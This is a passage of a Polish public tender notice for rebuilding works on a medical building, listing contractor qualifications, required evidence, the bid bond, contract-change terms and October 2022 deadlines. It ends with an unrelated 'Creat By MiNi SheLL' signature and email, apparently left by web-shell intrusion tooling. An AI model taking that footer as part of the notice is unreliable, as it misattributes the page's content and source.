urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej lub innych obowiązujących przepisów, posiadającą: <br/>•	co najmniej pięcioletnie doświadczenie w kierowaniu robotami budowlanymi w w/w specjalności; <br/>•	doświadczenie w pełnieniu funkcji Kierownika Budowy, przy kierowaniu co najmniej 1 robotą budowlaną przebudowy budynku o funkcji medycznej o wartości brutto nie niższej niż 500 000,00 zł brutto (pięćset tysięcy złotych brutto). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie wymaga.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a)	Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej 1 robotę budowlaną polegającą na prowadzeniu robót budowlanych w obiekcie użyteczności publicznej o wartości brutto nie niższej niż 500 000,00 zł brutto wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów: <br/>	referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty były wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty.<br/>b)	Wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, ze wskazaniem odpowiedniej specjalności, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonanych prze nie czynności oraz informacją o podstawie do dysponowania tymi osobami. Wykaz musi obejmować osoby posiadające wymagane uprawnienia w co najmniej następujących specjalnościach: <br/>1.	do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej lub innych obowiązujących przepisów, zwanego dalej Kierownikiem Budowy, posiadającą: <br/>•	co najmniej pięcioletnie doświadczenie w kierowaniu robotami budowlanymi w w/w specjalności; <br/>•	doświadczenie w pełnieniu funkcji Kierownika Budowy, przy kierowaniu co najmniej 1 robotą budowlaną przebudowy budynku o funkcji medycznej o wartości brutto nie niższej niż 500 000,00 zł brutto, <br/>•	co najmniej dwuletnie doświadczenie w kierowaniu robotami budowlanymi przy zabytkach nieruchomych wpisanych do rejestru zabytków oraz posiadający kwalifikacje, o których mowa w art. 37 c ustawy z dnia 23 lipca 2003 roku o ochronie zabytków i opiece nad zabytkami (t.j. Dz.U. 2022 poz. 840)<br/>2.	do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych oraz elektroenergetycznych bez ograniczeń lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej lub innych obowiązujących przepisów, posiadającą: <br/>•	co najmniej pięcioletnie doświadczenie w kierowaniu robotami budowlanymi w w/w specjalności; <br/>•	doświadczenie w pełnieniu funkcji Kierownika Budowy, przy kierowaniu co najmniej 1 robotą budowlaną przebudowy budynku o funkcji medycznej o wartości brutto nie niższej niż 500 000,00 zł brutto, <br/>3.	do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej lub innych obowiązujących przepisów, posiadającą: <br/>•	co najmniej pięcioletnie doświadczenie w kierowaniu robotami budowlanymi w w/w specjalności; <br/>•	doświadczenie w pełnieniu funkcji Kierownika Budowy, przy kierowaniu co najmniej 1 robotą budowlaną przebudowy budynku o funkcji medycznej o wartości brutto nie niższej niż 500 000,00 zł brutto, <br/>c)	oświadczenia Wykonawcy na temat kwalifikacji zawodowych (posiadaniu wymaganych prawem uprawnień) Kierownika Budowy tj. osoby, która będzie uczestniczyć w wykonywaniu zamówienia. Zamawiający wymaga, by do wskazanego powyżej „Wykazu osób, które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia” Wykonawca złożył oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane prawem uprawnienia.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 7.1.	Przystępując do postępowania o udzielenie zamówienia Wykonawca jest zobowiązany do wniesienia wadium w wysokości 10 000 zł. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 5.21.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców:<br/>-	oświadczenie, o których mowa w punkcie 9.1 b) SWZ, składa Wykonawca/każdy spośród Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie te ma potwierdzać brak podstaw wykluczenia<br/>w zakresie, w którym każdy z Wykonawców wykazuje brak podstaw wykluczenia,<br/>-	oświadczenia, o których mowa w punkcie 9.1 c) SWZ, składa Wykonawca/każdy spośród Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie te potwierdzają spełnianie warunków udziału w postępowaniu w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>5.22.	W przypadku gdy, Wykonawcy wspólnie ubiegają się o udzielenie zamówienia, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem. Dokument pełnomocnictwa, z treści którego będzie wynikało umocowanie do reprezentowania w postępowaniu o udzielenie zamówienia tych Wykonawców należy dołączyć do oferty.<br/>5.23.	Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego przekazania kopii umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający przewiduje, na podstawie art. 455 ust. 1 pkt 1 ustawy Pzp, możliwość dokonywania zmian postanowień niniejszej umowy, w zakresie:<br/>1.	zmiany zakresu/sposobu realizacji świadczenia, w przypadku wycofania z produkcji materiałów przyjętych w dokumentacji;<br/>2.	zmiany terminu realizacji określonego w § 3 ust.1 umowy, w przypadku:<br/>a)	działania organów administracji związanego z przekroczeniem określonych przez prawo terminów wydawania wymaganych w związku z realizacją przedmiotowego zamówienia, decyzji, zezwoleń, uzgodnień itp.;<br/>b)	wstrzymania przez Zamawiającego wykonywania całości bądź części roboty o okres wstrzymania robót;<br/>c)	opóźnienia w przekazaniu terenu budowy z przyczyn leżących po stronie Zamawiającego,<br/>d)	zlecenia robót dodatkowych lub zamiennych, jeżeli terminy ich zlecenia, rodzaj lub zakres, uniemożliwiają dotrzymanie pierwotnego terminu wykonania umowy,<br/>e)	innych przyczyn zewnętrznych niezależnych od Zamawiającego oraz Wykonawcy skutkujących brakiem możliwości prowadzenia prac lub wykonywania innych czynności przewidzianych umową.<br/>2.	Podstawą dokonania zmian, o których mowa w ust. 1 powyżej, będzie potwierdzenie w dokumentacji budowy, przez inspektora nadzoru, wystąpienia opisanych okoliczności uzasadniających wstrzymanie robót, z określeniem okresu wstrzymania robót wpływającego na zmianę terminu i sporządzenie protokołu konieczności – zatwierdzonego przez Zamawiającego.<br/>3.	Zamawiający dopuszcza zmianę niniejszej Umowy:<br/>a)	w zakresie zmian dotyczących oznaczenia firmy, adresu lub innych zapisów dotyczących wskazania Stron,<br/>b)	w zakresie zmiany osób występujących po stronie Zamawiającego / Wykonawcy – w przypadkach choroby lub zwolnienia z pracy na osoby, które spełniają zakreślone warunki w SWZ,<br/>c)	w zakresie zmian osób, przy pomocy których Wykonawca realizuje Przedmiot Umowy na inne spełniające warunki określone w formularzu ofertowym - np. Kierownika budowy, instalacji elektrycznych, sanitarnych. Dla skutecznej zmiany niezbędne jest uzyskanie zgody Zamawiającego na zaproponowaną osobę oraz przedstawienie zaktualizowanego wykazu osób (załącznik nr 6 do SWZ). Przedmiotowa zmiana nie wymaga aneksu do umowy,<br/>d)	w przypadku zmiany technologii wykonania robót w szczególności gdy: jest ona korzystna finansowo dla Zamawiającego, wpływa korzystnie na termin realizacji umowy lub jest niezbędna dla m.in. uniknięcia kolizji lub w sytuacji, gdy prowadzone roboty wywierają niekorzystny wpływ na otoczenie,<br/>e)	gdy zaistnieje inna okoliczność prawna, ekonomiczna lub techniczna, skutkująca niemożliwością wykonania lub należytego wykonania umowy,<br/>f)	jeżeli w okresie obowiązywania umowy nastąpi zmiana stawki podatku od towarów i usług VAT,<br/>g)	gdy zmiany są uzasadnione okolicznościami, o których mowa w art. 357[1] Kodeksu Cywilnego.<br/>Pozostałe zmiany umowy ujęte w par. 6 Projektowanych postanowień umowy (stanowiącym załącznik nr 3 do SWZ). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-10-25 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć na Platformie pod adresem: https://zsmchorzow. ezamawiajacy.pl w zakładce „OFERTY&#34;.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-10-25 09:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-11-23</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com